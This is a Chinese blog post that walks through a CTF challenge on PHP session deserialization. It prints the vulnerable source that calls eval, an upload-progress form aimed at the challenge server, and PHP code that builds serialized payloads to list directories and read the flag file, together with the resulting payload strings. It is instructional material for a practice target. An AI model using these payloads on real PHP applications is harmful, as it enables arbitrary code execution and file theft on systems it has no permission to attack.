PHP session反序列化漏洞

本文实现以下题目:

http://web.jarvisoj.com:32784/

解题思路:

1.session.upload_progress.enabled=On

解题过程如下:

1.打开地址,获取如下源代码

//A webshell is wait for you

ini_set('session.serialize_handler', 'php');

session_start();

class

OowoO

{

public

$mdzz;

function

__construct()

{

$this->mdzz = 'phpinfo();';

}

function

__destruct()

{

eval(

$this->mdzz);

}

}

if(isset(

$_GET['phpinfo']))

{

$m = new OowoO();

}

else

{

highlight_string(file_get_contents('index.php'));

}

?>

直接运行如下地址:

http://web.jarvisoj.com:32784/?phpinfo,查看PHPinfo页面,发现php.ini中默认session.serialize_handler为php_serialize,而index.php中将其设置为php。这就导致了seesion的反序列化问题。

2.利用session.upload_progress.enabled构造session

首先构造上传表单:

<!DOCTYPE html>

<html>

<head>

<title>test XXE</title>

<meta charset="utf-8">

</head>

<body>

<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data"><!--

不对字符编码-->

    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />

    <input type="file" name="file" />

    <input type="submit" value="go" />

</form>

</body>

反序列化代码如下:

<?php

classOowoO

{

public$mdzz='print_r(scandir(dirname(__FILE__)));';

}

$obj =newOowoO();

$a = serialize($obj);

var_dump($a);

执行获得序列化值:

O:5:"OowoO":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}

抓包拦截,将文件名修改如下:


可看到服务器端返回相关flag相关文件名为:Here_1s_7he_fl4g_buT_You_Cannot_see.php

获取文件路径:


/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php

运用如下代码构造序列化值,读取flag:

class OowoO

{

public $mdzz='print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));';

}

$obj = new OowoO();

$a = serialize($obj);

var_dump($a);

序列化结果为:

O:5:"OowoO":1:{s:4:"mdzz";s:88:"print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));";}

重放数据包,获得flag:


参考:https://blog.csdn.net/wy_97/article/details/78430690
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 原文链接:http://wyb0.com/posts/php-session-unserialize/ 0x00 ...
    cws阅读 2,303评论 0 5
  • php.ini设置,上传大文件: post_max_size = 128Mupload_max_filesize ...
    bycall阅读 6,822评论 3 64
  • 介绍序列化和反序列化 序列化和反序列化:大型网站中类创建的对象多的时候会占用大量空间,序列化就是将...
    草莓养殖户阅读 2,249评论 0 0
  • 11月28日,我们班上了药植实验课,王洪喜老师带领同学们观察了百部的细胞结构。
    卫校一六药一阅读 417评论 0 0
  • 佛教所言: “我观众生,更相噉肉,无非亲者。” 家里养的有生命之类, 多半是宿世的父母和六亲眷属。 能够成为我们桌...
    暖阳522阅读 315评论 0 1